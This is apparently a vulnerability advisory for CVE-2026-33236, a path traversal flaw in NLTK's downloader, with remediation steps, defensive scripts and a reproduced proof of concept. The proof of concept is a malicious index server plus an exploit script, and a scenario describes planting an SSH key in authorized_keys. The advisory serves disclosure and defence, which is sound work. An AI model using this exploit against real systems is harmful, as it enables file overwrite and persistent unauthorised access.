CVE-2026-33236 — HIGH (CVSS 8.1) AI Security Vulnerability

CISO Take

NLTK's downloader blindly trusts attacker-controlled XML index files, enabling arbitrary file overwrite on any machine running NLP/ML pipelines that download NLTK resources at runtime. Automated training infrastructure and CI/CD pipelines using custom index URLs face direct system file compromise—including SSH key injection and credential overwrites. Audit all NLTK deployments immediately for custom server_index_url usage, pre-bake corpora into container images to eliminate runtime downloads, and enforce egress controls blocking outbound HTTP to NLTK index servers.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
nltk	pip	<= 3.9.2	No patch

Do you use nltk? You're affected.

Severity & Risk

CVSS 3.1

8.1 / 10

EPSS

0.0%

chance of exploitation in 30 days

KEV Status

Not in KEV

Sophistication

Moderate

Recommended Action

1. Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (`pip show nltk`).
2. Patch: No official patched version released as of CVE publication; monitor https://github.com/nltk/nltk for release.
3. Workaround (preferred): Pre-download all required corpora and bake into container images; disable runtime NLTK downloads in production entirely.
4. Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines.
5. Audit: Search codebase for `Downloader(server_index_url=` with non-official URLs and treat each as a critical finding requiring immediate remediation.
6. Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages).
7. Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.
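
The audit step can be partly automated. The following is a minimal sketch, not an official tool: it walks a source tree and reports every line that sets `server_index_url`, so a reviewer can check whether the URL is an official one. The function name `find_index_url_overrides` and the regular expression are illustrative assumptions; a plain text match will also flag comments and the parameter definition inside NLTK itself if site-packages is scanned.

```python
import re
from pathlib import Path

# Matches keyword usage such as Downloader(server_index_url="http://...").
# Hypothetical pattern chosen for this sketch; it is a text match, not a parser.
INDEX_URL_PATTERN = re.compile(r"server_index_url\s*=")


def find_index_url_overrides(root):
    """Return (path, line_number, line) for each .py line that sets server_index_url."""
    findings = []
    for path in sorted(Path(root).rglob("*.py")):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        for number, line in enumerate(text.splitlines(), start=1):
            if INDEX_URL_PATTERN.search(line):
                findings.append((str(path), number, line.strip()))
    return findings


if __name__ == "__main__":
    import sys

    for file_path, line_number, line in find_index_url_overrides(sys.argv[1]):
        print(f"{file_path}:{line_number}: {line}")
```

Run against a repository root, each reported line still needs manual review: the sketch only locates candidate call sites and does not decide whether a URL is trustworthy.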

Classification

Supply Chain Code Execution Framework

AML.T0008.002 - Domains

AML.T0010.001 - AI Software

AML.T0011 - User Execution

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 9 - Risk Management System

ISO 42001

A.6.2 - AI System Supply Chain

NIST AI RMF

GOVERN-6.1 - AI Supply Chain Risk Management

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities

Technical Details

NVD Description

## Vulnerability Description

The NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:

1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system
2. **Arbitrary File Creation**: Create arbitrary files
3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)

## Vulnerability Principle

### Key Code Locations

**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)

```python
self.filename = os.path.join(subdir, id + ext)
```

- `subdir` and `id` are directly from XML attributes without any validation

**2. Path Construction Without Checks** (`nltk/downloader.py:679`)

```python
filepath = os.path.join(download_dir, info.filename)
```

- Directly uses `filename` which may contain path traversal

**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)

```python
os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)
```

- Can create arbitrary directories outside the download directory

**4. File Writing Without Protection** (`nltk/downloader.py:695`)

```python
with open(filepath, "wb") as outfile:
```

- Can write to arbitrary locations in the file system

### Attack Chain

```
1. Attacker controls remote XML index server
   ↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
   ↓
3. Victim executes: downloader.download('passwd')
   ↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
   ↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
   ↓
6. os.makedirs() creates directory: download_dir + "../../etc"
   ↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
   ↓
8. System file is overwritten!
```

## Impact Scope

1. **System File Overwrite**

## Reproduction Steps

### Environment Setup

1. Install NLTK

```bash
pip install nltk
```

2. Prepare malicious server and exploit script (see PoC section)

### Reproduction Process

**Step 1: Start malicious server**

```bash
python3 malicious_server.py
```

**Step 2: Run exploit script**

```bash
python3 exploit_vulnerability.py
```

**Step 3: Verify results**

```bash
ls -la /tmp/test_file.zip
```

## Proof of Concept

### Malicious Server (malicious_server.py)

```python
#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")

# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="test_file" subdir="../../../../../../../../../tmp" url="http://127.0.0.1:8888/test.zip" size="100" unzipped_size="100" unzip="0"/>
  </packages>
</nltk_data>
"""

# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
    f.write(malicious_xml)

with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
    zf.writestr("test.txt", "Path traversal attack!")


# HTTP Handler
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/malicious_index.xml':
            self.send_response(200)
            self.send_header('Content-type', 'application/xml')
            self.end_headers()
            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
                self.wfile.write(f.read())
        elif self.path == '/test.zip':
            self.send_response(200)
            self.send_header('Content-type', 'application/zip')
            self.end_headers()
            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
                self.wfile.write(f.read())
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, format, *args):
        pass


# Start server
if __name__ == "__main__":
    port = 8888
    server = HTTPServer(("0.0.0.0", port), Handler)
    print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
    print("Press Ctrl+C to stop")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nServer stopped")
```

### Exploit Script (exploit_vulnerability.py)

```python
#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile


def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
    download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
    print(f"Download directory: {download_dir}")

    # Exploit vulnerability
    from nltk.downloader import Downloader
    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
    downloader.download("test_file", quiet=True)

    # Check results
    expected_path = "/tmp/test_file.zip"
    if os.path.exists(expected_path):
        print(f"\n✗ Exploit successful! File written to: {expected_path}")
        print(f"✗ Path traversal attack successful!")
    else:
        print(f"\n? File not found, download may have failed")


if __name__ == "__main__":
    exploit()
```

### Execution Results

```
✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!
```
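
The missing check described under Key Code Locations is a containment test on the joined path. The sketch below shows one common way to express that test with the standard library. It is an illustration only and not NLTK's actual fix (no patch is published per the table above); the helper name `resolve_inside` is hypothetical.

```python
import os


def resolve_inside(download_dir, relative_name):
    """Return the absolute target path, or raise ValueError if it escapes download_dir.

    Hypothetical helper for illustration; not part of NLTK.
    """
    # Resolve symlinks and ".." segments on both sides before comparing.
    base = os.path.realpath(download_dir)
    target = os.path.realpath(os.path.join(base, relative_name))
    # commonpath equals base only when target is base itself or lives below it.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(
            f"refusing path outside download directory: {relative_name!r}"
        )
    return target
```

A wrapper around the downloader could call this on `subdir` and on the final filename before any `os.makedirs()` or `open()` call. An absolute `relative_name` is rejected as well, because `os.path.join` discards the base when the second argument is absolute.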

Exploitation Scenario

An adversary targeting an organization's NLP training pipeline identifies that the pipeline downloads NLTK resources at runtime against an HTTP (non-TLS) index server. The adversary performs a DNS hijack or BGP prefix hijack against the NLTK data hostname, redirecting index requests to a controlled malicious server. The malicious server returns a crafted XML with subdir='../../../.ssh' and id='authorized_keys'. When the nightly training job executes `nltk.download('punkt')`, NLTK constructs the path `download_dir + '../../../.ssh/authorized_keys.zip'`, creates the directory, and writes the attacker's crafted archive. After extraction, the attacker's SSH public key is present in authorized_keys—granting persistent, passwordless access to the ML training server, which typically holds sensitive training data, model artifacts, and credentials for internal APIs and data stores.
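
A crafted index like the one in this scenario can be spotted before the downloader acts on it. The sketch below parses an index document and lists `<package>` entries whose `id` or `subdir` contains traversal segments, an absolute path, or (for `id`) any path separator. The function names are hypothetical, the rules are an assumption about what a benign index looks like, and the check does not cover every platform-specific path form such as Windows drive prefixes.

```python
import xml.etree.ElementTree as ET
from pathlib import PurePosixPath


def _is_unsafe(value, allow_separators):
    """True if value is absolute, contains '..', or has separators where none are allowed."""
    normalized = value.replace("\\", "/")
    parts = PurePosixPath(normalized).parts
    if normalized.startswith("/") or ".." in parts:
        return True
    return not allow_separators and "/" in normalized


def suspicious_packages(index_xml):
    """Return (package_id, attribute_name) pairs for entries that look like traversal attempts.

    Note: ElementTree is not hardened against maliciously constructed XML
    (for example entity expansion); fetch and size-limit the index separately.
    """
    findings = []
    for pkg in ET.fromstring(index_xml).iter("package"):
        pkg_id = pkg.get("id", "")
        subdir = pkg.get("subdir", "")
        if _is_unsafe(pkg_id, allow_separators=False):
            findings.append((pkg_id, "id"))
        if _is_unsafe(subdir, allow_separators=True):
            findings.append((pkg_id, "subdir"))
    return findings
```

An empty result does not prove the index is trustworthy; it only shows that these two attributes pass a basic sanity check.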

Weaknesses (CWE)

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (Primary)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
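
The 8.1 score listed above can be reproduced from this vector. The following sketch applies the CVSS v3.1 base-score equations for the Scope: Unchanged case, using the metric weights from the public specification. The function names are illustrative, and the Scope: Changed branch is deliberately left out.

```python
import math

# CVSS v3.1 metric weights (PR values are those for Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, as defined in the CVSS v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged(vector):
    """Compute the base score for a CVSS:3.1 vector whose Scope is Unchanged."""
    # Skip the leading "CVSS:3.1" element, then map metric name to value.
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    if impact <= 0:
        return 0.0
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    return roundup(min(impact + exploitability, 10))


print(base_score_scope_unchanged("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"))  # 8.1
```

For this vector the impact sub-score is about 5.18 and the exploitability sub-score about 2.84; their sum of roughly 8.01 rounds up to 8.1.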

Timeline

Published

March 19, 2026

Last Modified

March 19, 2026

First Seen

March 24, 2026